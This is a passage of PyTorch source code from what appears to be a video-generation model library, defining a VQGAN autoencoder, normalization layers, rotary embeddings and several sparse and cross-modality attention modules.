leaky_relu(),\n nn.Conv2d(chan, chan, 1)\n )\n\n def forward(self, x):\n return self.net(x) + x\n\nclass VQGanAttention(nn.Module):\n def __init__(\n self,\n *,\n dim,\n dim_head = 64,\n heads = 8,\n dropout = 0.\n ):\n super().__init__()\n self.heads = heads\n self.scale = nn.Parameter(torch.ones(1, heads, 1, 1) * math.log(0.01))\n inner_dim = heads * dim_head\n\n self.dropout = 
nn.Dropout(dropout)\n self.post_norm = LayerNormChan(dim)\n\n self.cpb = ContinuousPositionBias(dim = dim // 4, heads = heads)\n self.to_qkv = nn.Conv2d(dim, inner_dim * 3, 1, bias = False)\n self.to_out = nn.Conv2d(inner_dim, dim, 1)\n\n def forward(self, x):\n h = self.heads\n height, width, residual = *x.shape[-2:], x.clone()\n\n q, k, v = self.to_qkv(x).chunk(3, dim = 1)\n\n q, k, v = map(lambda t: rearrange(t, 'b (h c) x y -> b h c (x y)', h = h), (q, k, v))\n\n q, k = map(l2norm, (q, k))\n\n sim = einsum('b h c i, b h c j -> b h i j', q, k) * self.scale.exp()\n\n sim = self.cpb(sim)\n\n attn = stable_softmax(sim, dim = -1)\n attn = self.dropout(attn)\n\n out = einsum('b h i j, b h c j -> b h c i', attn, v)\n out = rearrange(out, 'b h c (x y) -> b (h c) x y', x = height, y = width)\n out = self.to_out(out)\n\n return self.post_norm(out) + residual\n\nclass VQGanVAE(nn.Module):\n def __init__(\n self,\n *,\n dim,\n image_size,\n channels = 3,\n num_layers = 4,\n layer_mults = None,\n l2_recon_loss = False,\n use_hinge_loss = True,\n num_resnet_blocks = 1,\n vgg = None,\n vq_codebook_size = 512,\n vq_decay = 0.8,\n vq_commitment_weight = 1.,\n vq_kmeans_init = True,\n vq_use_cosine_sim = True,\n use_attn = True,\n attn_dim_head = 64,\n attn_heads = 8,\n resnet_groups = 16,\n attn_dropout = 0.,\n first_conv_kernel_size = 5,\n use_vgg_and_gan = True,\n **kwargs\n ):\n super().__init__()\n assert dim % resnet_groups == 0, f'dimension {dim} must be divisible by {resnet_groups} (groups for the groupnorm)'\n\n vq_kwargs, kwargs = groupby_prefix_and_trim('vq_', kwargs)\n\n self.image_size = image_size\n self.channels = channels\n self.num_layers = num_layers\n self.codebook_size = vq_codebook_size\n\n self.encoders = MList([])\n self.decoders = MList([])\n\n layer_mults = default(layer_mults, list(map(lambda t: 2 ** t, range(num_layers))))\n assert len(layer_mults) == num_layers, 'layer multipliers must be equal to designated number of layers'\n\n layer_dims = [dim * mult for mult in layer_mults]\n dims = (dim, *layer_dims)\n codebook_dim = layer_dims[-1]\n\n dim_pairs = zip(dims[:-1], dims[1:])\n\n append = lambda arr, t: arr.append(t)\n prepend = lambda arr, t: arr.insert(0, t)\n\n if not isinstance(num_resnet_blocks, tuple):\n num_resnet_blocks = (*((0,) * (num_layers - 1)), num_resnet_blocks)\n\n if not isinstance(use_attn, tuple):\n use_attn = (*((False,) * (num_layers - 1)), use_attn)\n\n assert len(num_resnet_blocks) == num_layers, 'number of resnet blocks config must be equal to number of layers'\n assert len(use_attn) == num_layers\n\n for layer_index, (dim_in, dim_out), layer_num_resnet_blocks, layer_use_attn in zip(range(num_layers), dim_pairs, num_resnet_blocks, use_attn):\n append(self.encoders, nn.Sequential(nn.Conv2d(dim_in, dim_out, 4, stride = 2, padding = 1), leaky_relu()))\n prepend(self.decoders, nn.Sequential(nn.Upsample(scale_factor = 2, mode = 'bilinear', align_corners = False), nn.Conv2d(dim_out, dim_in, 3, padding = 1), leaky_relu()))\n\n if layer_use_attn:\n prepend(self.decoders, VQGanAttention(dim = dim_out, heads = attn_heads, dim_head = attn_dim_head, dropout = attn_dropout))\n\n for _ in range(layer_num_resnet_blocks):\n append(self.encoders, ResBlock(dim_out, groups = resnet_groups))\n prepend(self.decoders, GLUResBlock(dim_out, groups = resnet_groups))\n\n if layer_use_attn:\n append(self.encoders, VQGanAttention(dim = dim_out, heads = attn_heads, dim_head = attn_dim_head, dropout = attn_dropout))\n\n prepend(self.encoders, nn.Conv2d(channels, dim, 
first_conv_kernel_size, padding = first_conv_kernel_size // 2))\n append(self.decoders, nn.Conv2d(dim, channels, 1))\n\n self.vq = VQ(\n dim = codebook_dim,\n codebook_size = vq_codebook_size,\n decay = vq_decay,\n commitment_weight = vq_commitment_weight,\n accept_image_fmap = True,\n kmeans_init = vq_kmeans_init,\n use_cosine_sim = vq_use_cosine_sim,\n **vq_kwargs\n )\n\n # reconstruction loss\n\n self.recon_loss_fn = F.mse_loss if l2_recon_loss else F.l1_loss\n\n # turn off GAN and perceptual loss if grayscale\n\n self.vgg = None\n self.discr = None\n self.use_vgg_and_gan = use_vgg_and_gan\n\n if not use_vgg_and_gan:\n return\n\n # preceptual loss\n\n if exists(vgg):\n self.vgg = vgg\n else:\n self.vgg = torchvision.models.vgg16(pretrained = True)\n self.vgg.classifier = nn.Sequential(*self.vgg.classifier[:-2])\n\n # gan related losses\n\n self.discr = Discriminator(dims = dims, channels = channels)\n\n self.discr_loss = hinge_discr_loss if use_hinge_loss else bce_discr_loss\n self.gen_loss = hinge_gen_loss if use_hinge_loss else bce_gen_loss\n\n @property\n def codebook(self):\n return self.vq.codebook\n\n def encode(self, fmap):\n for enc in self.encoders:\n fmap = enc(fmap)\n\n return self.vq(fmap)\n\n def decode(self, fmap):\n for dec in self.decoders:\n fmap = dec(fmap)\n\n return fmap\n\n @torch.no_grad()\n def get_video_indices(self, video):\n b, f, _, h, w = video.shape\n images = rearrange(video, 'b f ... -> (b f) ...')\n _, indices, _ = self.encode(images)\n return rearrange(indices, '(b f) ... -> b f ...', b = b)\n\n def forward(\n self,\n img,\n return_loss = False,\n return_discr_loss = False,\n return_recons = False\n ):\n batch, channels, height, width, device = *img.shape, img.device\n assert height == self.image_size and width == self.image_size, 'height and width of input image must be equal to {self.image_size}'\n assert channels == self.channels, 'number of channels on image or sketch is not equal to the channels set on this VQGanVAE'\n\n fmap, indices, commit_loss = self.encode(img)\n\n fmap = self.decode(fmap)\n\n if not return_loss and not return_discr_loss:\n return fmap\n\n assert return_loss ^ return_discr_loss, 'you should either return autoencoder loss or discriminator loss, but not both'\n\n # whether to return discriminator loss\n\n if return_discr_loss:\n assert exists(self.discr), 'discriminator must exist to train it'\n\n fmap.detach_()\n img.requires_grad_()\n\n fmap_discr_logits, img_discr_logits = map(self.discr, (fmap, img))\n\n gp = gradient_penalty(img, img_discr_logits)\n\n discr_loss = self.discr_loss(fmap_discr_logits, img_discr_logits)\n\n loss = discr_loss + gp\n\n if return_recons:\n return loss, fmap\n\n return loss\n\n # reconstruction loss\n\n recon_loss = self.recon_loss_fn(fmap, img)\n\n # early return if training on grayscale\n\n if not self.use_vgg_and_gan:\n if return_recons:\n return recon_loss, fmap\n\n return recon_loss\n\n # perceptual loss\n\n img_vgg_input = img\n fmap_vgg_input = fmap\n\n if img.shape[1] == 1:\n # handle grayscale for vgg\n img_vgg_input, fmap_vgg_input = map(lambda t: repeat(t, 'b 1 ... 
-> b c ...', c = 3), (img_vgg_input, fmap_vgg_input))\n\n img_vgg_feats = self.vgg(img_vgg_input)\n recon_vgg_feats = self.vgg(fmap_vgg_input)\n perceptual_loss = F.mse_loss(img_vgg_feats, recon_vgg_feats)\n\n # generator loss\n\n gen_loss = self.gen_loss(self.discr(fmap))\n\n # calculate adaptive weight\n\n last_dec_layer = self.decoders[-1].weight\n\n norm_grad_wrt_gen_loss = grad_layer_wrt_loss(gen_loss, last_dec_layer).norm(p = 2)\n norm_grad_wrt_perceptual_loss = grad_layer_wrt_loss(perceptual_loss, last_dec_layer).norm(p = 2)\n\n adaptive_weight = safe_div(norm_grad_wrt_perceptual_loss, norm_grad_wrt_gen_loss)\n adaptive_weight.clamp_(max = 1e4)\n\n # combine losses\n\n loss = recon_loss + perceptual_loss + commit_loss + adaptive_weight * gen_loss\n\n if return_recons:\n return loss, fmap\n\n return loss\n\n# normalizations\n\nclass StableLayerNorm(nn.Module):\n def __init__(self, dim):\n super().__init__()\n self.norm = nn.LayerNorm(dim)\n\n def forward(self, x):\n x = x / x.amax(dim = -1, keepdim = True).detach()\n return self.norm(x)\n\nclass PreNorm(nn.Module):\n def __init__(\n self,\n *,\n dim,\n fn\n ):\n super().__init__()\n self.norm = nn.LayerNorm(dim)\n self.fn = fn\n\n def forward(self, x, **kwargs):\n x = self.norm(x)\n return self.fn(x, **kwargs)\n\nclass SandwichNorm(nn.Module):\n def __init__(\n self,\n *,\n dim,\n fn\n ):\n super().__init__()\n self.prenorm = nn.LayerNorm(dim)\n self.postnorm = nn.LayerNorm(dim)\n self.fn = fn\n\n def forward(self, x, **kwargs):\n x = self.prenorm(x)\n x = self.fn(x, **kwargs)\n x = self.postnorm(x)\n return x\n\n# relative positional embedding (rotary)\n\nclass RotaryEmbedding(nn.Module):\n def __init__(self, dim):\n super().__init__()\n inv_freq = 1. / (10000 ** (torch.arange(0, dim, 2).float() / dim))\n self.register_buffer('inv_freq', inv_freq)\n\n def forward(self, seq_len, device):\n inv_freq = self.inv_freq\n t = torch.arange(seq_len, device = device).type_as(inv_freq)\n freqs = torch.einsum('i , j -> i j', t, inv_freq)\n return torch.cat((freqs, freqs), dim = -1)\n\ndef rotate_half(x):\n x = rearrange(x, '... (j d) -> ... 
j d', j = 2)\n x1, x2 = x.unbind(dim = -2)\n return torch.cat((-x2, x1), dim = -1)\n\ndef apply_rotary_pos_emb(freqs, t):\n rot_dim = freqs.shape[-1]\n t, t_pass = t[..., :rot_dim], t[..., rot_dim:]\n t = (t * freqs.cos()) + (rotate_half(t) * freqs.sin())\n return torch.cat((t, t_pass), dim = -1)\n\n# helper classes\n\nclass ShiftVideoTokens(nn.Module):\n def __init__(\n self,\n fn,\n image_size,\n shift_space = True,\n shift_time = False\n ):\n super().__init__()\n self.fn = fn\n self.image_size = image_size\n\n self.shift_time = shift_time\n self.shift_space = shift_space\n\n def forward(self, x, **kwargs):\n\n if not self.shift_time and not self.shift_space:\n return self.fn(x, **kwargs)\n\n image_size = self.image_size\n img_seq_len = image_size ** 2\n\n x_bos, x_video = x[:, :1], x[:, 1:]\n n = x_video.shape[1]\n\n # pad to nearest frame\n\n padding = img_seq_len - (n % img_seq_len)\n x_video = F.pad(x_video, (0, 0, 0, padding), value = 0.)\n\n # reshape to video\n\n x_video = rearrange(x_video, 'b (f h w) d -> b f h w d', h = image_size, w = image_size)\n\n x_image_h = x_image_w = x_frame = None\n\n # chunk depending on whether shifting time, space, or both\n\n if self.shift_space and self.shift_time:\n x_frame, x_image_h, x_image_w, *x_rest = x_video.chunk(5, dim = -1)\n elif self.shift_space:\n x_image_h, x_image_w, *x_rest = x_video.chunk(4, dim = -1)\n elif self.shift_time:\n x_frame, *x_rest = x_video.chunk(3, dim = -1)\n\n # shifts\n\n if self.shift_space:\n x_image_h = F.pad(x_image_h, (0, 0, 0, 0, 1, -1))\n x_image_w = F.pad(x_image_w, (0, 0, 1, -1))\n\n if self.shift_time:\n x_frame = F.pad(x_frame, (0, 0, 0, 0, 0, 0, 1, -1))\n\n # concat\n\n x_shifted = [x_frame, x_image_h, x_image_w, *x_rest]\n x_shifted = list(filter(exists, x_shifted))\n\n x_video = torch.cat(x_shifted, dim = -1)\n\n # merge text and image sequence back together\n\n x_video = rearrange(x_video, 'b f h w d -> b (f h w) d')\n x_video = x_video[:, :n]\n\n x = torch.cat((x_bos, x_video), dim = 1)\n return self.fn(x, **kwargs)\n\nclass GEGLU(nn.Module):\n def forward(self, x):\n x, gate = x.chunk(2, dim = -1)\n return x * F.gelu(gate)\n\nclass FeedForward(nn.Module):\n def __init__(\n self,\n *,\n dim,\n mult = 4,\n dropout = 0.,\n chunk_size = None, # chunk size to process feedforward, along sequence length, from Reformer paper. 
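# A minimal sketch of the chunked-feedforward idea referenced in the comment above (Reformer-style):
# because a position-wise feedforward acts on each sequence position independently, splitting the
# sequence along its length, running each chunk separately, and concatenating the outputs is exact;
# it only lowers peak memory. The layer and tensor sizes below are arbitrary illustrative values,
# not parameters taken from this module.
import torch
import torch.nn as nn

ff = nn.Sequential(nn.Linear(64, 256), nn.GELU(), nn.Linear(256, 64))
x = torch.randn(2, 1024, 64)                       # (batch, seq_len, dim)

full = ff(x)                                        # all positions at once
chunked = torch.cat([ff(c) for c in x.split(256, dim=-2)], dim=-2)  # 4 chunks of 256 positions

assert torch.allclose(full, chunked, atol=1e-6)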
None means do not chunk\n ):\n super().__init__()\n inner_dim = (dim * mult * 2) // 3\n self.chunk_size = chunk_size\n\n self.net = nn.Sequential(\n nn.Linear(dim, inner_dim * 2),\n GEGLU(),\n nn.Dropout(dropout),\n nn.Linear(inner_dim, dim)\n )\n\n def forward(self, x):\n if not exists(self.chunk_size):\n return self.net(x)\n\n x_chunks = x.split(self.chunk_size, dim = -2)\n out_chunks = [self.net(c) for c in x_chunks]\n return torch.cat(out_chunks, dim = -2)\n\n# attention classes\n\nclass Attention(nn.Module):\n def __init__(\n self,\n *,\n dim,\n heads = 8,\n dim_head = 64,\n causal = False,\n dropout = 0.\n ):\n super().__init__()\n inner_dim = heads * dim_head\n self.heads = heads\n self.causal = causal\n self.scale = dim_head ** -0.5\n\n self.null_k = nn.Parameter(torch.randn(heads, 1, dim_head))\n self.null_v = nn.Parameter(torch.randn(heads, 1, dim_head))\n\n self.talking_heads = nn.Conv2d(heads, heads, 1, bias = False)\n self.dropout = nn.Dropout(dropout)\n self.to_q = nn.Linear(dim, inner_dim, bias = False)\n self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False)\n self.to_out = nn.Linear(inner_dim, dim)\n\n def forward(\n self,\n x,\n mask = None,\n context = None,\n context_mask = None,\n rotary_pos_emb = None\n ):\n b, h, device = x.shape[0], self.heads, x.device\n\n has_context = exists(context)\n kv_input = context if has_context else x\n\n qkv = (self.to_q(x), *self.to_kv(kv_input).chunk(2, dim = -1))\n q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv)\n\n # add rotary positional embedding, if exists\n\n if not has_context and exists(rotary_pos_emb):\n apply_rotary = partial(apply_rotary_pos_emb, rotary_pos_emb)\n q, k, v = map(apply_rotary, (q, k, v))\n\n # add null key / values, needed for condition dropout\n\n null_k = repeat(self.null_k, 'h 1 d -> b h 1 d', b = b)\n null_v = repeat(self.null_v, 'h 1 d -> b h 1 d', b = b)\n\n k = torch.cat((null_k, k), dim = -2)\n v = torch.cat((null_v, v), dim = -2)\n\n # scale\n\n q = q * self.scale\n\n # similarity\n\n sim = einsum('b h i d, b h j d -> b h i j', q, k)\n\n # masking\n\n mask_value = -torch.finfo(x.dtype).max\n\n key_mask = mask if not has_context else context_mask\n\n if exists(key_mask):\n key_mask = F.pad(key_mask, (1, 0), value = True) # always pay attention to null key / value\n key_mask = rearrange(key_mask, 'b j -> b 1 1 j')\n sim = sim.masked_fill(~key_mask, mask_value)\n\n if self.causal:\n i, j = sim.shape[-2:]\n mask = torch.ones(i, j, device = device, dtype = torch.bool).triu_(j - i + 1)\n sim = sim.masked_fill(mask, mask_value)\n\n # attention\n\n attn = stable_softmax(sim, dim = -1)\n attn = self.talking_heads(attn)\n attn = self.dropout(attn)\n\n # aggregate, merge, and combine heads\n\n out = einsum('b h i j, b h j d -> b h i d', attn, v)\n out = rearrange(out, 'b h n d -> b n (h d)')\n return self.to_out(out)\n\nclass Sparse3DNA(nn.Module):\n def __init__(\n self,\n dim,\n video_shape,\n kernel_size = 3,\n dilation = 1,\n heads = 8,\n dim_head = 64,\n dropout = 0.,\n causal = False,\n query_num_frames_chunk = None\n ):\n super().__init__()\n inner_dim = dim_head * heads\n self.heads = heads\n self.scale = dim_head ** -0.5\n\n self.dropout = nn.Dropout(dropout)\n self.to_q = nn.Linear(dim, inner_dim, bias = False)\n self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False)\n\n self.talking_heads = nn.Conv2d(heads, heads, 1, bias = False)\n self.to_out = nn.Linear(inner_dim, dim)\n\n self.dilation = cast_tuple(dilation, size = 3)\n\n self.kernel_size = cast_tuple(kernel_size, 
size = 3)\n assert all(map(lambda n: n % 2 == 1, self.kernel_size)), 'kernel size must be odd'\n\n self.kernel_numel = self.kernel_size[0] * self.kernel_size[1] * self.kernel_size[2]\n\n # calculate padding\n\n self.padding_frame = calc_same_padding(self.kernel_size[0], self.dilation[0])\n self.padding_height = calc_same_padding(self.kernel_size[1], self.dilation[1])\n self.padding_width = calc_same_padding(self.kernel_size[2], self.dilation[2])\n\n self.video_padding = (self.padding_width, self.padding_width, self.padding_height, self.padding_height, self.padding_frame, self.padding_frame)\n\n # save video shape and calculate max number of tokens\n\n self.video_shape = video_shape\n max_frames, fmap_size, _ = video_shape\n max_num_tokens = torch.empty(video_shape).numel()\n self.max_num_tokens = max_num_tokens\n\n # how many query tokens to process at once to limit peak memory usage, by multiple of frame tokens (fmap_size ** 2)\n\n self.query_num_frames_chunk = default(query_num_frames_chunk, max_frames)\n\n # precalculate causal mask\n\n indices = torch.arange(max_num_tokens)\n shaped_indices = rearrange(indices, '(f h w) -> 1 1 f h w', f = max_frames, h = fmap_size, w = fmap_size)\n padded_indices = F.pad(shaped_indices, self.video_padding, value = max_num_tokens) # padding has value of max tokens so to be masked out\n unfolded_indices = unfoldNd(padded_indices, kernel_size = self.kernel_size, dilation = self.dilation)\n unfolded_indices = rearrange(unfolded_indices, '1 k n -> n k')\n\n # if causal, compare query and key indices and make sure past cannot see future\n # if not causal, just mask out the padding\n\n if causal:\n mask = rearrange(indices, 'n -> n 1') < unfolded_indices\n else:\n mask = unfolded_indices == max_num_tokens\n\n mask = F.pad(mask, (1, 0), value = False) # bos tokens never get masked out\n self.register_buffer('mask', mask)\n\n def forward(self, x, **kwargs):\n b, n, _, h, device = *x.shape, self.heads, x.device\n\n # more variables\n\n dilation = self.dilation\n kernel_size = self.kernel_size\n video_padding = self.video_padding\n fmap_size = self.video_shape[1]\n\n bos_only = n == 1\n tokens_per_frame = fmap_size ** 2\n\n padding = 0 if bos_only else (tokens_per_frame - (n - 1) % tokens_per_frame)\n num_frames = (n + padding) // tokens_per_frame\n\n # pad for last token in video\n\n padded_x = F.pad(x, (0, 0, 0, padding), value = 0.) 
if padding > 0 else x\n\n # derive queries / keys / values\n\n q, k, v = (self.to_q(x), *self.to_kv(padded_x).chunk(2, dim = -1))\n\n # early return if <bos>\n\n if bos_only:\n return self.to_out(v)\n\n # split out heads\n\n q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> (b h) n d', h = h), (q, k, v))\n\n # scale queries\n\n q = q * self.scale\n\n # take care of bos\n\n q = q[:, 1:]\n bos_value = v[:, :1]\n\n # compute keys and values\n\n (k_bos, k), (v_bos, v) = map(lambda t: (t[:, :1], t[:, 1:]), (k, v))\n\n # reshape keys and values to video and add appropriate padding along all dimensions (frames, height, width)\n\n k, v = map(lambda t: rearrange(t, 'b (f h w) d -> b d f h w', f = num_frames, h = fmap_size), (k, v))\n k, v = map(lambda t: F.pad(t, video_padding), (k, v))\n\n # put the attention processing code in a function\n # to allow for processing queries in chunks of frames\n\n out = []\n\n def attend(q, k, v, mask, k_bos, v_bos, kernel_size):\n chunk_length = q.shape[1]\n\n k, v = map(lambda t: unfoldNd(t, kernel_size = kernel_size, dilation = dilation), (k, v))\n k, v = map(lambda t: rearrange(t, 'b (d j) i -> b i j d', j = self.kernel_numel), (k, v))\n k, v = map(lambda t: t[:, :chunk_length], (k, v))\n\n # append bos keys and values\n\n k_bos, v_bos = map(lambda t: repeat(t, 'b 1 d -> b n 1 d', n = k.shape[1]), (k_bos, v_bos))\n k = torch.cat((k_bos, k), dim = 2)\n v = torch.cat((v_bos, v), dim = 2)\n\n # calculate sim\n\n sim = einsum('b i d, b i j d -> b i j', q, k)\n\n # causal mask\n\n if exists(mask):\n mask_value = -torch.finfo(sim.dtype).max\n mask = rearrange(mask, 'i j -> 1 i j')\n sim = sim.masked_fill(mask, mask_value)\n\n # attention\n\n attn = stable_softmax(sim, dim = -1)\n\n attn = rearrange(attn, '(b h) ... -> b h ...', h = h)\n attn = self.talking_heads(attn)\n attn = rearrange(attn, 'b h ... 
-> (b h) ...')\n\n attn = self.dropout(attn)\n\n # aggregate values\n\n return einsum('b i j, b i j d -> b i d', attn, v)\n\n # process queries in chunks\n\n frames_per_chunk = min(self.query_num_frames_chunk, num_frames)\n chunk_size = frames_per_chunk * tokens_per_frame\n\n q_chunks = q.split(chunk_size, dim = 1)\n\n mask = self.mask[:(n - 1)]\n mask_chunks = mask.split(chunk_size, dim = 0)\n\n for ind, (q_chunk, mask_chunk) in enumerate(zip(q_chunks, mask_chunks)):\n q_chunk = q_chunks[ind]\n mask_chunk = mask_chunks[ind]\n\n # slice the keys and values to the appropriate frames, accounting for padding along frames dimension\n\n kv_start_pos = ind * frames_per_chunk\n kv_end_pos = kv_start_pos + (ind + frames_per_chunk + self.padding_frame * 2)\n kv_frame_range = slice(kv_start_pos, kv_end_pos)\n\n k_slice, v_slice = map(lambda t: t[:, :, kv_frame_range], (k, v))\n\n # calculate output chunk\n\n out_chunk = attend(\n q = q_chunk,\n k = k_slice,\n v = v_slice,\n mask = mask_chunk,\n k_bos = k_bos,\n v_bos = v_bos,\n kernel_size = kernel_size,\n )\n\n out.append(out_chunk)\n\n # combine all chunks\n\n out = torch.cat(out, dim = 1)\n\n # append bos value\n\n out = torch.cat((bos_value, out), dim = 1) # bos will always adopt its own value, since it pays attention only to itself\n\n # merge heads\n\n out = rearrange(out, '(b h) n d -> b n (h d)', h = h)\n return self.to_out(out)\n\nclass SparseCross2DNA(nn.Module):\n def __init__(\n self,\n *,\n dim,\n image_size,\n heads = 8,\n dim_head = 64,\n dropout = 0.,\n kernel_size = 3,\n dilation = 1,\n ):\n super().__init__()\n inner_dim = heads * dim_head\n self.heads = heads\n self.scale = dim_head ** -0.5\n\n self.null_k = nn.Parameter(torch.randn(heads, 1, dim_head))\n self.null_v = nn.Parameter(torch.randn(heads, 1, dim_head))\n\n self.talking_heads = nn.Conv3d(heads, heads, 1, bias = False)\n self.dropout = nn.Dropout(dropout)\n self.to_q = nn.Linear(dim, inner_dim, bias = False)\n self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False)\n self.to_out = nn.Linear(inner_dim, dim)\n\n # handle variables for 2d unfold\n\n self.image_size = image_size\n self.kernel_size = kernel_size\n self.dilation = dilation\n self.padding = calc_same_padding(kernel_size, dilation)\n\n def forward(\n self,\n x,\n *,\n context,\n context_mask = None,\n **kwargs\n ):\n b, n, h, device = x.shape[0], x.shape[1], self.heads, x.device\n\n fmap_size, kernel_size, dilation, padding = self.image_size, self.kernel_size, self.dilation, self.padding\n\n context_len = context.shape[-2]\n tokens_per_frame = fmap_size * fmap_size\n kernel_numel = kernel_size * kernel_size\n\n # always have context mask avaiable\n\n if not exists(context_mask):\n context_mask = torch.ones((b, context_len), dtype = torch.bool, device = device)\n\n mask_value = -torch.finfo(x.dtype).max\n\n # derive queries, keys, values\n\n qkv = (self.to_q(x), *self.to_kv(context).chunk(2, dim = -1))\n q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv)\n\n # scale\n\n q = q * self.scale\n\n # handle bos\n\n q_bos, q = q[:, :, 0], q[:, :, 1:]\n\n null_k_for_bos = repeat(self.null_k, 'h 1 d -> b h 1 d', b = b)\n null_v_for_bos = repeat(self.null_v, 'h 1 d -> b h 1 d', b = b)\n\n k_for_bos = torch.cat((null_k_for_bos, k), dim = -2)\n v_for_bos = torch.cat((null_v_for_bos, v), dim = -2)\n\n sim_bos = einsum('b h d, b h j d -> b h j', q_bos, k_for_bos)\n\n bos_context_mask = rearrange(context_mask, 'b j -> b 1 j')\n bos_context_mask = F.pad(bos_context_mask, (1, 0), value = True)\n sim_bos = 
sim_bos.masked_fill(~bos_context_mask, mask_value)\n\n attn_bos = stable_softmax(sim_bos, dim = -1)\n out_bos = einsum('b h j, b h j d -> b h d', attn_bos, v_for_bos)\n out_bos = rearrange(out_bos, 'b h d -> b 1 (h d)')\n\n # early return if only bos token\n\n if n == 1:\n return self.to_out(out_bos)\n\n # reshape key / values to be unfolded\n\n k, v = map(lambda t: rearrange(t, 'b h (f x y) d -> (b h f) d x y', x = fmap_size, y = fmap_size), (k, v))\n k, v = map(lambda t: F.unfold(t, kernel_size = kernel_size, dilation = dilation, padding = padding), (k, v))\n k, v = map(lambda t: rearrange(t, '(b h f) (d j) i -> b h i (f j) d', b = b, h = h, j = kernel_numel), (k, v))\n\n # add null key / values, needed for condition dropout\n\n null_k = repeat(self.null_k, 'h 1 d -> b h i 1 d', b = b, i = tokens_per_frame)\n null_v = repeat(self.null_v, 'h 1 d -> b h i 1 d', b = b, i = tokens_per_frame)\n\n k = torch.cat((null_k, k), dim = -2)\n v = torch.cat((null_v, v), dim = -2)\n\n # pad queries to nearest frame\n\n q_remainder = q.shape[-2] % tokens_per_frame\n q_padding = 0 if q_remainder == 0 else (tokens_per_frame - q_remainder)\n q = F.pad(q, (0, 0, 0, q_padding), value = 0.)\n\n # similarity\n\n q = rearrange(q, 'b h (f i) d -> b h f i d', i = tokens_per_frame)\n\n sim = einsum('b h f i d, b h i j d -> b h f i j', q, k)\n\n # masking\n\n context_mask = rearrange(context_mask, 'b (f x y) -> (b f) 1 x y', x = fmap_size, y = fmap_size)\n context_mask = F.unfold(context_mask.float(), kernel_size = kernel_size, dilation = dilation, padding = padding)\n context_mask = context_mask == 1.\n context_mask = rearrange(context_mask, '(b f) j i -> b 1 1 i (f j)', b = b, j = kernel_numel)\n context_mask = F.pad(context_mask, (1, 0), value = True) # always pay attention to null key / value\n\n sim = sim.masked_fill(~context_mask, mask_value)\n\n # attention\n\n attn = stable_softmax(sim, dim = -1)\n attn = self.talking_heads(attn)\n attn = self.dropout(attn)\n\n # aggregate, merge, and combine heads\n\n out = einsum('b h f i j, b h i j d -> b h f i d', attn, v)\n out = rearrange(out, 'b h f n d -> b (f n) (h d)')\n\n # add output for bos back\n\n out = torch.cat((out_bos, out), dim = 1)\n\n return self.to_out(out[:, :n])\n\n\"\"\"\nFor efficient audio <-> video attention\nLargely inspired by chunk cross attention from https://arxiv.org/abs/2112.04426\n\"\"\"\n\ndef padding_to_multiple_of(n, mult):\n remainder = n % mult\n if remainder == 0:\n return 0\n return mult - remainder\n\nclass CrossModalityCrossAttention(nn.Module):\n def __init__(\n self,\n *,\n dim,\n chunk_size,\n context_chunk_size,\n heads = 8,\n dim_head = 64,\n context_dim = None,\n has_start_token = True,\n context_has_start_token = True,\n norm = False,\n norm_context = False,\n dropout = 0.\n ):\n super().__init__()\n context_dim = default(context_dim, dim)\n\n self.heads = heads\n self.scale = dim_head ** -0.5\n inner_dim = dim_head * heads\n\n self.norm = nn.LayerNorm(dim) if norm else nn.Identity()\n self.context_norm = nn.LayerNorm(context_dim) if norm_context else nn.Identity()\n\n self.to_q = nn.Linear(dim, inner_dim, bias = False)\n self.to_kv = nn.Linear(context_dim, inner_dim * 2, bias = False)\n self.to_out = nn.Linear(inner_dim, dim)\n\n self.null_k = nn.Parameter(torch.randn(heads, dim_head))\n self.null_v = nn.Parameter(torch.randn(heads, dim_head))\n\n self.talking_heads = nn.Conv3d(heads, heads, 1)\n self.dropout = nn.Dropout(dropout)\n\n self.has_start_token = has_start_token\n self.context_has_start_token = 
context_has_start_token\n\n self.chunk_size = chunk_size\n self.context_chunk_size = context_chunk_size\n\n def forward(\n self,\n seq,\n context,\n mask = None,\n context_mask = None\n ):\n seq_shape, device = seq.shape, seq.device\n\n # get lengths of sequence and context, excluding start token\n\n seq_len = seq.shape[-2] - (1 if self.has_start_token else 0)\n context_len = context.shape[-2] - (1 if self.context_has_start_token else 0)\n\n # determine padding\n # depending on whether start token exists\n\n seq_left_pad = -1 if self.has_start_token else 0\n seq_right_pad = padding_to_multiple_of(seq_len, self.chunk_size)\n\n seq_out_left_pad = -seq_left_pad\n seq_out_right_pad = -seq_right_pad\n\n context_left_pad = self.context_chunk_size - (1 if self.context_chunk_size else 0)\n context_right_pad = padding_to_multiple_of(context_len, self.context_chunk_size)\n\n # do actual padding so divisible by chunk size (video frame)\n\n seq = F.pad(seq, (0, 0, seq_left_pad, seq_right_pad), value = 0.)\n context = F.pad(context, (0, 0, context_left_pad, context_right_pad), value = 0.)\n\n if exists(context_mask):\n context_mask = F.pad(context_mask, (context_left_pad, context_right_pad), value = False)\n\n # break into chunks\n\n \"\"\"\n b - batch\n n - num chunks\n c - chunks\n d - feature dimension\n h - heads\n \"\"\"\n\n seq = rearrange(seq, 'b (n c) d -> b n c d', c = self.chunk_size)\n context = rearrange(context, 'b (n c) d -> b n c d', c = self.context_chunk_size)\n\n if exists(context_mask):\n context_mask = rearrange(context_mask, 'b (n c) -> b n c', c = self.context_chunk_size)\n\n # determine if sequence is longer than context, or vice versa, when aligned for time\n\n seq_num_chunks = seq.shape[-3]\n context_num_chunks = context.shape[-3]\n\n if seq_num_chunks <= context_num_chunks:\n context = context[:, :seq_num_chunks]\n\n if exists(context_mask):\n context_mask = context_mask[:, :seq_num_chunks]\n else:\n # handle the case where the sequence has more chunks\n # in which case the sequence is curtailed, and output of attention is 0 for the excised right portion\n\n seq = seq[:, :context_num_chunks]\n seq_out_right_pad += self.chunk_size * (seq_num_chunks - context_num_chunks)\n\n # early exit if nothing to attend to\n\n if context.shape[1] == 0:\n return torch.zeros(seq_shape, device = device)\n\n # pre layernorm\n\n seq = self.norm(seq)\n context = self.context_norm(context)\n\n # attention time!\n\n q = self.to_q(seq)\n k, v = self.to_kv(context).chunk(2, dim = -1)\n\n q, k, v = map(lambda t: rearrange(t, 'b n c (h d) -> b h n c d', h = self.heads), (q, k, v))\n q = q * self.scale\n\n null_k, null_v = map(lambda t: repeat(t, 'h d -> b h n 1 d', b = 